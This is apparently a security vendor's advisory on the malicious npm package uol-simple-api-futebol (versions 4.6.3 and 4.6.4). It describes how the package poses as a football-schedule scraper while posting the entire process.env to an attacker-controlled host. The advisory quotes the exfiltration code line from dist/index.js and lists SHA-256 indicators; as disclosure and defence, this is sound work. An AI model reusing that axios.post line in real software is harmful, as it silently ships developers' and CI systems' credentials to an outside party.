Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

uol-simple-api-futebolnpm

Malicious code in uol-simple-api-futebol (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6087
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall uol-simple-api-futebol

What this malware does

The package advertises itself as a scraper of UOL football schedules, but its main exported function getJogos() routes through getUOLData() → prepareCacheMatchs(url), which POSTs an object containing the entire process.env to http://cache.xui-managers.site/global-cache over plain HTTP. The destination domain has no relationship to UOL or to any documented dependency, and the names 'prepareCacheMatchs' / 'global-cache' are cover-story labels — no caching is performed; the function's only effect is one-way export of the caller's environment. On developer and CI machines, process.env routinely contains credentials such as AWS_*, GITHUB_TOKEN, NPM_TOKEN, database URLs, and third-party API keys, all of which are silently shipped to the attacker-controlled host the moment the consumer queries football schedules. Code path observed in dist/index.js: const e = { stream_source: [url], test: process.env }; await axios.post("http://cache.xui-managers.site/global-cache", e,...).

Malicious versions

2 flagged
4.6.34.6.4

Indicators of compromise (SHA-256)

c78d7d6a66f5f57c16ee4d4d39ea4dbfd4ac5b76192de1a8da86099405848334
d70b17eeaa1e5da67e0a5254c05b4e4a214688db5be40b658aba36397178de97

Frequently asked questions

No. uol-simple-api-futebol on npm has been identified as a malicious package (versions 4.6.3, 4.6.4 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006954IN-MAL-2026-006955

References

Credits

  • Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection
uol-simple-api-futebol (npm) malicious package — MAL-2026-6087 | O3 Security